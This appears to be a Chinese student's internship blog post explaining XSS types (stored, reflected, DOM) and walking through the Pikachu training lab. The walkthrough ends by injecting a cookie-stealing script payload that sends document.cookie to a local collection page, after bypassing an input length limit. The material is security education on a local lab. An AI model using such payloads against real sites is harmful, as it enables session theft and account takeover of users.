• 粤嵌科技毕业实习Day14

    粤嵌科技毕业实习Day14

    XSS(跨站脚本攻击)

    • Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全。

    • XSS 的本质是:恶意代码未经过滤,与网站正常的代码混在一起;浏览器无法分辨哪些脚本是可信的,导致恶意脚本被执行。

      而由于直接在用户的终端执行,恶意代码能够直接获取用户的信息,或者利用这些信息冒充用户向网站发起攻击者定义的请求

      在部分情况下,由于输入的限制,注入的恶意脚本比较短。但可以通过引入外部的脚本,并由浏览器执行,来完成比较复杂的攻击策略。

    • XSS图解

    • XSS分类

      • 根据攻击的来源,XSS 攻击可分为存储型、反射型和 DOM 型三种。

      • 存储区:恶意代码存放的位置

      • 插入点:由谁取得恶意代码,并插入到网页上。

        • 存储型 XSS

          • 这种攻击常见于带有用户保存数据的网站功能,如论坛发帖、商品评论、用户私信等。
          1. 攻击者将恶意代码提交到目标网站的数据库中。
          2. 用户打开目标网站时,网站服务端将恶意代码从数据库取出,拼接在 HTML 中返回给浏览器。
          3. 用户浏览器接收到响应后解析执行,混在其中的恶意代码也被执行。
          4. 在部分情况下,恶意代码加载外部的代码,用于执行更复杂的逻辑。
          5. 恶意代码窃取用户数据并发送到攻击者的网站,或者冒充用户的行为,调用目标网站接口执行攻击者指定的操作。

        • 反射型 XSS 的攻击步骤:

          1. 攻击者构造出特殊的 URL,其中包含恶意代码。
          2. 用户打开带有恶意代码的 URL 时,网站服务端将恶意代码从 URL 中取出,拼接在 HTML 中返回给浏览器。
          3. 用户浏览器接收到响应后解析执行,混在其中的恶意代码也被执行。
          4. 在部分情况下,恶意代码加载外部的代码,用于执行更复杂的逻辑
          5. 恶意代码窃取用户数据并发送到攻击者的网站,或者冒充用户的行为,调用目标网站接口执行攻击者指定的操作。
          6. 反射型 XSS 跟存储型 XSS 的区别是:存储型 XSS 的恶意代码存在数据库里,反射型 XSS 的恶意代码存在 URL 里。
          7. 反射型 XSS 漏洞常见于通过 URL 传递参数的功能,如网站搜索、跳转等。
          8. 由于需要用户主动打开恶意的 URL 才能生效,攻击者往往会结合多种手段诱导用户点击。
          9. POST 的内容也可以触发反射型 XSS,只不过其触发条件比较苛刻(需要构造表单提交页面,并引导用户点击),所以非常少见。

        • DOM 型 XSS 的攻击步骤:

          1. 攻击者构造出特殊的 URL,其中包含恶意代码。
          2. 用户打开带有恶意代码的 URL。
          3. 用户浏览器接收到响应后解析执行,前端 JavaScript 取出 URL 中的恶意代码并执行。
          4. 在部分情况下,恶意代码加载外部的代码,用于执行更复杂的逻辑。
          5. 恶意代码窃取用户数据并发送到攻击者的网站,或者冒充用户的行为,调用目标网站接口执行攻击者指定的操作。
          6. DOM 型 XSS 跟前两种 XSS 的区别:DOM 型 XSS 攻击中,取出和执行恶意代码由浏览器端完成,属于前端 JavaScript 自身的安全漏洞,而其他两种 XSS 都属于服务端的安全漏洞。

          Document Object Model(文档对象模型)HTML DOM 定义了访问和操作 HTML 文档的标准。

    XSS练习

    1. 搭建xss后台

      1. 修改phpstudyPHPTutorialWWWpikachuincconfig.inc配置文件

        //定义数据库连接参数
define('DBHOST', 'localhost');//将localhost修改为数据库服务器的地址
define('DBUSER', 'root');//将root修改为连接mysql的用户名
define('DBPW', 'root');//将root修改为连接mysql的密码

    2. 登录到xss后台

      1. 找到管理工具-XSS后台

    1. 初始化安装

    1. 输入提示的用户密码

    1. 通过后台,可以查看搜集到的cookie。

    1. 修改phpStudyPHPTutorialWWWpikachupkxssxcookiecookie.php的header里面的重定向地址
    header("Location:http://127.0.0.1/pikachu/index.php");//重定向到一个可信的网站
    1. 获取反射型xss的cookie

    1. 输入测试

    1. 按F12查看源码,可以发现最大长度为20,导致无法输入更多的内容,直接修改到200

    1. 输入并提交下面代码搜集cookie
    <script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

    1. 前往xss后台,查看获取的cookie

    referer地址一旦被访问就会跳回主页,同时获取到cookie值。

    本文作者:AlubNoBug
    本文链接:https://www.cnblogs.com/AlubNoBug/p/13695520.html
  • 相关阅读:
    css---box-sizing
    float与inline-block的一些应用场景的区别
    一些html元素的最原始状态
    css之深入理解overflow
    css中的锚点
    新增UI样式
    zh-CN、zh-Hans区别
    SourceTree 3.3.6安装跳过注册安装
    Windows sever 由于管理员设置的策略,该磁盘处于脱机状态的解决方法。
    CentOS7.x安装VNC实录
  • 原文地址:https://www.cnblogs.com/AlubNoBug/p/13695520.html
Copyright © 2020-2023  润新知